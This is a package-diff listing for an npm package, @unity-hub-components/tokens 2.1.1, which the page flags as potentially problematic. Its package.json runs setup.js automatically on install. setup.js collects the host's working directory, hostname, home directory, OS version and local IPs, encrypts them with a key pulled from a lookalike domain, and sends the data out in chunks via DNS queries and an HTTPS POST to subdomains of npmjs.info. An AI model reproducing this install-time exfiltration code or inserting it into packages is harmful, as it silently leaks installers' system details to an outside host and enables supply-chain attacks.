@unity-hub-components/tokens 2.1.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @unity-hub-components/tokens might be problematic. Click here for more details.
- package/index.js +0 -0
- package/package.json +11 -0
- package/setup.js +169 -0
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,11 @@
|
|
1
|
+
{
|
2
|
+
"name": "@unity-hub-components/tokens",
|
3
|
+
"version": "2.1.1",
|
4
|
+
"description": "This package is a proof of concept used by an independent researcher. It has been uploaded for test purposes only.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"install": "node setup.js @unity-hub-components/tokens"
|
8
|
+
},
|
9
|
+
"author": "CapybaraSecurity@protonmail.com",
|
10
|
+
"license": "ISC"
|
11
|
+
}
|
package/setup.js
ADDED
@@ -0,0 +1,169 @@
|
|
1
|
+
var cwd
|
2
|
+
var secret
|
3
|
+
var hostname
|
4
|
+
var homedir
|
5
|
+
var version
|
6
|
+
var ip
|
7
|
+
var url
|
8
|
+
var data
|
9
|
+
var dataChunks
|
10
|
+
var maxLength = 25
|
11
|
+
|
12
|
+
|
13
|
+
var AESCrypt = {};
|
14
|
+
|
15
|
+
AESCrypt.encrypt = function(cryptkey, iv, cleardata) {
|
16
|
+
|
17
|
+
var encipher = crypto.createCipheriv('aes-256-cbc', cryptkey, iv);
|
18
|
+
var encryptdata = encipher.update(cleardata, 'utf8', 'binary');
|
19
|
+
|
20
|
+
encryptdata += encipher.final('binary');
|
21
|
+
encode_encryptdata = new Buffer.from(encryptdata, 'binary').toString('hex');
|
22
|
+
|
23
|
+
return encode_encryptdata;
|
24
|
+
|
25
|
+
}
|
26
|
+
|
27
|
+
|
28
|
+
function generateUID() {
|
29
|
+
|
30
|
+
var firstPart = (Math.random() * 46656) | 0;
|
31
|
+
var secondPart = (Math.random() * 46656) | 0;
|
32
|
+
|
33
|
+
firstPart = ("000" + firstPart.toString(36)).slice(-3);
|
34
|
+
secondPart = ("000" + secondPart.toString(36)).slice(-3);
|
35
|
+
|
36
|
+
return firstPart + secondPart;
|
37
|
+
|
38
|
+
}
|
39
|
+
|
40
|
+
|
41
|
+
function splitToSubstrings(str, n) {
|
42
|
+
|
43
|
+
const arr = [];
|
44
|
+
|
45
|
+
for (let index = 0; index < str.length; index += n) {
|
46
|
+
|
47
|
+
arr.push(str.slice(index, index + n));
|
48
|
+
|
49
|
+
}
|
50
|
+
|
51
|
+
return arr;
|
52
|
+
|
53
|
+
}
|
54
|
+
|
55
|
+
|
56
|
+
function shuffle(array) {
|
57
|
+
let currentIndex = array.length, randomIndex;
|
58
|
+
|
59
|
+
while (currentIndex != 0) {
|
60
|
+
|
61
|
+
randomIndex = Math.floor(Math.random() * currentIndex);
|
62
|
+
currentIndex--;
|
63
|
+
|
64
|
+
[array[currentIndex], array[randomIndex]] = [
|
65
|
+
array[randomIndex], array[currentIndex]];
|
66
|
+
}
|
67
|
+
|
68
|
+
return array;
|
69
|
+
}
|
70
|
+
|
71
|
+
|
72
|
+
try{
|
73
|
+
|
74
|
+
cwd = process.cwd()
|
75
|
+
|
76
|
+
} catch(e) {
|
77
|
+
}
|
78
|
+
|
79
|
+
|
80
|
+
try{
|
81
|
+
|
82
|
+
var os = require("os");
|
83
|
+
hostname = os.hostname();
|
84
|
+
homedir = os.homedir()
|
85
|
+
version = os.release()
|
86
|
+
|
87
|
+
} catch(e) {
|
88
|
+
}
|
89
|
+
|
90
|
+
|
91
|
+
try{
|
92
|
+
|
93
|
+
var ifaces = require('os').networkInterfaces();
|
94
|
+
var adresses = Object.keys(ifaces).reduce(function (result, dev) {
|
95
|
+
|
96
|
+
return result.concat(ifaces[dev].reduce(function (result, details) {
|
97
|
+
|
98
|
+
return result.concat(details.family === 'IPv4' && !details.internal ? [details.address] : []);
|
99
|
+
|
100
|
+
}, []));
|
101
|
+
|
102
|
+
});
|
103
|
+
|
104
|
+
ip = adresses
|
105
|
+
|
106
|
+
} catch(e) {
|
107
|
+
}
|
108
|
+
|
109
|
+
|
110
|
+
data = "{" + "\"" + process.argv[2] + "\"" + ":{" + "\"timestamp\":\"" + Math.floor(new Date().getTime() / 1000).toString() + "\",\"cwd\":\"" + cwd + "\",\"hostname\":\"" + hostname + "\",\"homedir\":\"" + homedir + "\",\"version\":\"" + version + "\",\"local_ip\":\"" + ip + "\"}}"
|
111
|
+
|
112
|
+
try{
|
113
|
+
|
114
|
+
var crypto = require('crypto')
|
115
|
+
var dns = require('dns');
|
116
|
+
|
117
|
+
dns.resolveTxt("provider.npmjs.info", (err, addresses)=> secret = addresses);
|
118
|
+
var key = crypto.createHash('sha256').update(String(secret)).digest()
|
119
|
+
var iv = crypto.randomBytes(16);
|
120
|
+
mutex = iv.toString('hex')
|
121
|
+
|
122
|
+
var encoded = AESCrypt.encrypt(key, iv, data)
|
123
|
+
|
124
|
+
} catch(e) {
|
125
|
+
|
126
|
+
encoded = Buffer.from(data,'utf-8').toString('hex')
|
127
|
+
mutex = generateUID()
|
128
|
+
|
129
|
+
}
|
130
|
+
|
131
|
+
dataChunks = splitToSubstrings(encoded, maxLength)
|
132
|
+
var indicie = shuffle(Array.apply(null, {length: dataChunks.length}).map(Number.call, Number))
|
133
|
+
|
134
|
+
for (let item of indicie) {
|
135
|
+
|
136
|
+
try{
|
137
|
+
|
138
|
+
url = dataChunks[indicie[item]] + "." + (indicie[item] + 64).toString(16) + "." + mutex + '.api.npmjs.info'
|
139
|
+
const dns = require('dns');
|
140
|
+
dns.resolve(url, "A", (err, records)=> test = records);
|
141
|
+
|
142
|
+
} catch(e) {
|
143
|
+
|
144
|
+
url = dataChunks[indicie[item]] + "." + (indicie[item] + 64).toString(16) + "." + mutex + '.api.npmjs.info'
|
145
|
+
const https = require('https');
|
146
|
+
|
147
|
+
const options = {
|
148
|
+
|
149
|
+
hostname: url,
|
150
|
+
port: 443,
|
151
|
+
path: '/',
|
152
|
+
method: 'POST',
|
153
|
+
headers: {
|
154
|
+
'Content-Type': 'application/json',
|
155
|
+
'Content-Length': data.length
|
156
|
+
},
|
157
|
+
rejectUnauthorized: false
|
158
|
+
|
159
|
+
}
|
160
|
+
|
161
|
+
index +=1
|
162
|
+
const req = https.request(options, res => {});
|
163
|
+
|
164
|
+
req.write(data);
|
165
|
+
req.end();
|
166
|
+
|
167
|
+
}
|
168
|
+
|
169
|
+
}
|